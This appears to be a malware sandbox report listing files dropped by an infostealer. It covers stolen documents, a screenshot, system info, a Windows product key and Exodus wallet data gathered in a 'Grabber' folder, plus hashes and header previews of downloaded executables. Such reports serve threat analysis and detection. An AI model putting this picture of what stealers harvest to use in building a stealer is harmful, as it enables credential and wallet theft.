Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZIPXYXWIOY.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\System\Desktop.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	91426
Entropy (8bit):	7.84929611898644
Encrypted:	false
SSDEEP:	1536:CAdFnpB6gr6QxAArpyIx5OP/nOF0J0602e0nZ2Bg6mqdXeFnbO/U0ydg:p5B6guUAUpJ1F0J0PH04BBmqQFa/nydg
MD5:	D177A2F39F64D4EE70CB3E5C1EBFB94A
SHA1:	FE59AF0BA5250FAC8EDBE69C65F4048B857DB59E
SHA-256:	090CE9BBCE0C67FFA7FB8932496052927FEC4C5B60B3B77F9962BF46C57E33F1
SHA-512:	DA1B132E32974AB7E22A7D250E4FE61EA1ACA4CB70F97C3EF76CFB6864CDAF52F1A8B67E94CED7C9B8F9E7B64DC7BC0725CDA2FB3B4E43C92FDA1FA5ACE5E558
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\System\Info.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	513
Entropy (8bit):	5.420305633438869
Encrypted:	false
SSDEEP:	12:RFNewPRbVkb2A2YDAh/PjNszJxWW/vdUXyl:3EwP/kbNRDAh/PjNQJxWW6I
MD5:	F6D06B6A75FBB4CEEE3F97B36638B78E
SHA1:	AB44E6CD7BCA6839709D034170AE559680FFBA30
SHA-256:	40AA061F2B7C980073C3A095436C93C5A7CC6029941ACAC894A5707B82E8856B
SHA-512:	8004F43E6D6969CF01E23EBA5AA40AEE7605DC6AAFEBD42ECF03E3DEFEC702251166E3BEF002616CA73B9F3CDF70FE26673DD64E6EBD6009621BF665A2F94960
Malicious:	false
Preview:	.[IP].External IP: 8.46.123.175.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 124406.System: Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: V3DE76L.RAM: 4095MB.DATE: 2024-12-10 5:11:27 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (1%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Debugger: False.Processe: False.Hosting: False.Antivirus: Windows Defender..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17576
Entropy (8bit):	5.604604945133577
Encrypted:	false
SSDEEP:	384:xG9E9LtfkKDfHfytKpfdDYXf1foJpfQfdfUfFrUHbf0UC1K0N6Aqyt1fUf4fxfAh:xG9E9LtfkKDfHfytKpfdDYXf1foJpfQX
MD5:	C8497CC820B370FF067BB203160F4ABF
SHA1:	8405AB61E798C2434F21402D3155BF3CE12364B8
SHA-256:	2C7688014FBFD9864F2196F23CA371DD59373F7EC5B3A6A4C4AEED256CB96F68
SHA-512:	719206DEB3ACA79BAC1FA92A27D9ABDED8C5D7F4356D96CF8422DDCE51F914E6DD3A8C47169FF939EB84F5345DF167339A764BBD57B50C28B9E25F6D55885100
Malicious:	false
Preview:	NAME: togIMvsocrKvhuqtKIVKEE ..PID: 2584 ..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: svchost ..PID: 2152 ..EXE: ..NAME: togIMvsocrKvhuqtKIVKEE ..PID: 1288 ..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: RuntimeBroker ..PID: 4732 ..EXE: ..NAME: csrss ..PID: 420 ..EXE: ..NAME: skotes ..PID: 1708 ..EXE: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe..NAME: togIMvsocrKvhuqtKIVKEE ..PID: 2796 ..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togIMvsocrKvhuqtKIVKEE ..PID: 6128 ..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: svchost ..PID: 5152 ..EXE: ..NAME: 9e4b3ff3c2 ..PID: 408 ..EXE: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.142295219190901
Encrypted:	false
SSDEEP:	3:j9iqeexNFn:Bn
MD5:	672C0746770E7C9F6A3A01A01390F993
SHA1:	0CA6ACA8CBDDD82D9521A26C780CD905955DB1B7
SHA-256:	A3AD80CBFD722176E2FE6B994DD0C24989810136BC8C9E527EF8BF82E3114AF8
SHA-512:	8A7F6AA024A1C0992DB3CC14E55E37F3DBCFE5978D7BF715A3F90B0D786EEA813EA536989ABD00D619E62D9933F4BB4F09E02FF4AACF25A4C37034CA2B925281
Malicious:	false
Preview:	97XG3-NC7HW-JVYPT-2Y4TT-RQVXB

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	14910
Entropy (8bit):	5.614036775373325
Encrypted:	false
SSDEEP:	384:xUfWfFfafbfff8fQfbfbf3fNfefZf2f9fOfBfSf/fKfofgflfOfcf9fafSfZfGf1:xUfWfFfafbfff8fQfbfbf3fNfefZf2fD
MD5:	4910601E74AC3D50C123B40B539A4FB0
SHA1:	2133962783EB163CC1B1CB5A921B647963A356A6
SHA-256:	E4C04A4B790D783A1959B2F1C70AE36CD854CE571D1F129B70F5C63126975E40
SHA-512:	56EEF70D13D49E54E20FF43CA999A610BE99462BECFA3CC85F826DEE017C065C5CE4C95A8336333C5F22B76CDD55768882C5DDD6070B92B54526DB4A101001C2
Malicious:	false
Preview:	NAME: togIMvsocrKvhuqtKIVKEE..TITLE: New Tab - Google Chrome..PID: 2584..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togIMvsocrKvhuqtKIVKEE..TITLE: New Tab - Google Chrome..PID: 1288..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togIMvsocrKvhuqtKIVKEE..TITLE: New Tab - Google Chrome..PID: 2796..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togIMvsocrKvhuqtKIVKEE..TITLE: New Tab - Google Chrome..PID: 6128..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togIMvsocrKvhuqtKIVKEE..TITLE: New Tab - Google Chrome..PID: 4712..EXE: C:\Program Files (x86)\LQdmESvbzyTAUsyPzciQlbfMjfbpBTvtahrUqBiOtEKeQDktOcgfUFjPvBMTemVAJCUj\togIMvsocrKvhuqtKIVKEE.exe..NAME: togI

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	367
Entropy (8bit):	5.215993814069912
Encrypted:	false
SSDEEP:	6:kk8aM1923oH+Tcwt8age8Y55HEZzXELIx2KLlp8hMq2P923oH+Tcwt8age8Y55H0:kk8ahYeb8rcHEZrEkVLT8uv4Yeb8rcH0
MD5:	6B9F5B8743F68BCE7EC2C3C5550E37E2
SHA1:	DFB609C9CBFCA8CCA3EF409DE9E1BE1699AE5C51
SHA-256:	422C5727958B56FCAF5F4097F10EF8DE06A46952261EBEDBB96C1AACADD8D693
SHA-512:	E74077F9627DF163DC70F141A9FDE145292F048456F182F5F19CAB49DED7C3EE8D53923B7BCB2200F17E531EEDE0209984B3681E6BFDF2F5B4DD66695A87CF6F
Malicious:	false
Preview:	2023/10/04-14:34:43.146 1894 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/04-14:34:43.148 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1780224
Entropy (8bit):	7.9447173130625375
Encrypted:	false
SSDEEP:	24576:t3zWzM1zlwIyi4Bz61K4b0XVPjoIkv8iYq93dK0vhPIuwX7EtLpPUaoG5aROs:t3SMdCIyjz67Kxl3iThvhPIu1lD/S
MD5:	319888DF2E3F79F5DD0A3CDBFCCDDC03
SHA1:	0196EE658FF0320A5CACA2D3D99D8365AEBD2AB5
SHA-256:	7748B1BCB3E80DE9058F023A7A490B9BDF9BBDAB59B17C3351A84FEB21C6056D
SHA-512:	37A8116026113102BEE0E0DCEE9833774FFF2372F4AB5DBAB210AAFC2DAED8E961FDAA1458A8C0DEC8A5C0561CFEECEBD7CC31755F522B2735C8E4389FE0D1AE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......Ph...........@...........................h...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..)...$......\|..............@...razuzqfw......N......~..............@...rexqpveb.....@h.....................@....taggant.0...Ph.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1839104
Entropy (8bit):	7.947700581511831
Encrypted:	false
SSDEEP:	49152:qeNCyvXugD9/YgWCKtIhmNUemaJAbO+dB:qe/+gDWgWZSa6
MD5:	28CD41E552164EFDF6EAF4C5F00B7821
SHA1:	B16422716CA83C131C1CBD6C6FD4C1A8FDFA800B
SHA-256:	07224A91D2FC05F6B417CAAA70C22DA0C49D553B0D68F36270F05990DC0EB2AC
SHA-512:	91074CDDF0B9411579D07C46058E6429B92CB3CD97932B0F5036F0F8F6B8B2AD4B609BD2CAA3C5AAEE7F5D1B88B051C9EFC8BD3C97B132002EA8F9F11EDB1178
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..............................H...........@...........................H...........@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... ..)..P.......X..............@...zroyxpcd....../......Z..............@...chhltftk......H.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1966080
Entropy (8bit):	7.9368732008222995
Encrypted:	false
SSDEEP:	49152:hFVsVPJ6tytS4Xgo2cv2kzr6++5ReRdbLMf:hFWGtNSL6D5QdbLMf
MD5:	5ABD444028545A70AC140F6C244F0DA8
SHA1:	5B46C706DFE9F4F443A894D746A76020A1835077
SHA-256:	03704AC5905C8ED32D791115AC52F119286075A5D25E3BE6724F3B990C3F6361
SHA-512:	94B8033182016B9EFF96E2360656C54724DF879AC0F071C9FC2D95A07B012B462592813940D7623A100B6BBAC6689EC461CCCACB6CF316BD7981CB8A48C19652
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@..................................[......................................Z.B.n.....@.h!......................................................................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... ..).. B.....................@...wdmfkhwd......k.....................@...dxdebgre............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	968192
Entropy (8bit):	6.698604812936097
Encrypted:	false
SSDEEP:	24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aZcT/:uTvC/MTQYxsWR7aZM
MD5:	965DF7E678A228FEA2B2966AD816C837
SHA1:	A360356AEFCA30A227C816072C2C57220E78E6F8
SHA-256:	423451AD973A9B1B5AF5BAD45160A50C6F842B7FA70CE189D3D09F2FCCC42B63
SHA-512:	ABF08A3ADBC3611F5AC0416EA374E8B22491914DF6DDC543096E966EFC0A57726C36F4EB8B210F7639A44F813F5CF63349A634E6B81036AF374793951EB54CF9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...-.Xg..........".................w.............@.......................... ............@...@.......@.....................d...\|....@...Z.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....Z...@...\..................@..@.reloc...u.......v...P..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H3tyh96[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1765888
Entropy (8bit):	7.937376255539818
Encrypted:	false
SSDEEP:	49152:IkXhu5J6iLKcMu/FQHujIytryx1GLMfzhh9JHTJ6qyrBbL:I0i9/COjIhkMfzhhMf
MD5:	40F8C17C136D4DC83B130C9467CF6DCC
SHA1:	E9B6049AA7DA0AF9718F2F4AE91653D9BAC403BB
SHA-256:	CAFB60920939BD2079D96F2E6E73F87632BC15BD72998F864E8968F7AAB9623B
SHA-512:	6760A0752957535EC45CE3307E31569AC263EB73157D6A424D6E30647651A4E93DB7C0378028D9E0CE07E65A357D2BB81047064CCDA2F6A13FA7402EE7794C2D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............................E.. ...@....@.. ....................... F.....%.....@.................................U`..i....@.......................a...................................................................................... . . ... ....... ..............@....rsrc........@......................@....idata . ...`......................@... . *.........................@...kzyimikk. ....+.....................@...vgdirfva. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2845184
Entropy (8bit):	6.520896037175064
Encrypted:	false
SSDEEP:	49152:Ubl9SIU7x3RneBrqphQYmbfyaVeUQN7phsX9AQ:Ubl9SIUdhkepCyaUP5YX9r
MD5:	0B1D6A5C334E4BA1FFC4E7E8E59D182B
SHA1:	E241C9CBE4EC0FB12C4433987B9C83278D7F649B
SHA-256:	7EA0C446D291E2D665222B38A85336C08FC18F0A50236C23DBDBB49E17DB7606
SHA-512:	0D8F3E42B3AD2F0A69FEE7E8E4FC2B400AF40D287598D57BAFA2FBB13DBC17D24688A6DCBEE592935DD127BFDAF394A4B855FCACEDA1B305CDE5A30A0E49DFD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ....................... ,.....T.+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...fdostlpk. +.......+..:..............@...xuupeoyq. ....+......B+.............@....taggant.@....+.."...H+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1468
Entropy (8bit):	5.433067305766462
Encrypted:	false
SSDEEP:	24:3g9WSKco4KmM6GjKbmOIKo+mN1s4RPQoU99tXt/NK3R88bJ07rA4Oo3W:yWSU4Yymp+ms4RIoU99tlNWR8378mW
MD5:	B9316D1A99F8893F4C08C481180E59DF
SHA1:	B00412D029C35100F85F90856819297DF6CF363F
SHA-256:	BF21DD73E20B8C1F064C1AB651880D9D327997633210C7068963735DB6D13D2A
SHA-512:	4BAF383F865FFB22733E43AA947D9D8345B4CD6F365FCBE8577B2F15FEA61759D6EB94656C6953773EADEE71C36E0496E66D69D470FF4F61E5FCA615BCB946B4
Malicious:	false
